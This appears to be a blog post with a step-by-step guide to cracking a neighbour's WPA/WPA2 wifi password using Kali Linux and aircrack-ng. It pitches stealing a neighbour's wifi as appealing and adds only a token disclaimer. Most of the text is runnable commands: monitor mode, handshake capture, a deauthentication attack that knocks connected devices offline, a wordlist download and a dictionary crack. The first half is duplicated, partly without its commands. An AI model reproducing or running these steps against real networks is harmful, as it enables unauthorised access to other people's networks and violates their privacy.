Hacking.. Wouldn't it be great if you can hack you neighbours wifi password and use that for rest of your life. Yeah it would be.. But there is a problem if they find out you can end up in jail. But for the purpose of your curosity I will tell you how can you hack the wifi password using Kali Linux. But use this only for the purpose of your curosity as it is a voilation of somebodies privacy. We don't recommend using this on strangers/friends/neighbours.. anybody.
Requirements:
Step 1: Open the terminal. Install aircrack
Step 2: Type airmon-ng command prompt. You will see the interfaces. Mostly it is wlan0
Step 3: Then type airmon-ng start wlan0, replace wlan0 with your interface name.
Step 4: Type iwconfig, to enable monitor mode interface. Then type airmon-ng check kill, this will kill all the processes that are raising a conflict. Also check the name of your monitor interface (usually mon0 or wlan0mon). In my case it was wlan0mon.
Step 5: Then use command airodump-ng wlan0mon. It will display all the router nearby. Select the router you want to hack. And copy its MAC id and channel number.
Step 6: Use this command to monitor the network for handshake.
Step 7: (Deauth Attact, optional) If you impatient like me, you can use Deauth Attack. It will disconnect the device which is already connected to router and the device will connect again proving you the required information to hack the password. Just type on another terminal window
Step 8: Once "WPA handshake: " followed by MAC address of the router appears on upper-right of the airodump-ng terminal, you can close airodump-ng by pressing Ctrl+C.
Step 9: Go to desktop, there will be four new files. Rename *.csv file. mv ./-01.cap name.cap. Then download the wordlist file by using this command curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Step 10: Using aircrack to crack the password,
Requirements:
- Linux (I used Kali) - if you don't have Kali use this link
- aircrack-ng (apt-get install aircrack-ng)
- Word dictionary (https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt)
Step 1: Open the terminal. Install aircrack
sudo apt-get install aircrack-ngComplete the installation
Step 2: Type airmon-ng command prompt. You will see the interfaces. Mostly it is wlan0
Step 3: Then type airmon-ng start wlan0, replace wlan0 with your interface name.
Step 4: Type iwconfig, to enable monitor mode interface. Then type airmon-ng check kill, this will kill all the processes that are raising a conflict. Also check the name of your monitor interface (usually mon0 or wlan0mon). In my case it was wlan0mon.
Step 5: Then use command airodump-ng wlan0mon. It will display all the router nearby. Select the router you want to hack. And copy its MAC id and channel number.
Step 6: Use this command to monitor the network for handshake.
airodump-ng -c <channel> --bssid <MAC> -w /root/Desktop/ wlan0monReplace:
- <channel> with the channel number of the router
- <MAC> with the mac address of the router
Step 7: (Deauth Attact, optional) If you impatient like me, you can use Deauth Attack. It will disconnect the device which is already connected to router and the device will connect again proving you the required information to hack the password. Just type on another terminal window
aireplay-ng -0 2 -a <MAC-router> -c <MAC-device> wlan0monReplace:
- <MAC-router> with MAC address of router
- <MAC-device> with MAC address of the device
Step 8: Once "WPA handshake: " followed by MAC address of the router appears on upper-right of the airodump-ng terminal, you can close airodump-ng by pressing Ctrl+C.
Step 9: Go to desktop, there will be four new files. Rename *.csv file. mv ./-01.cap name.cap. Then download the wordlist file by using this command curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Step 10: Using aircrack to crack the password,
aircrack-ng -a2 -b <MAC> -w rockyou.txt name.capReplace:
- <MAC> with the mac of the router
- use -a instead of -a2 for WPA. -a2 is used for WPA2.
Comments
Post a Comment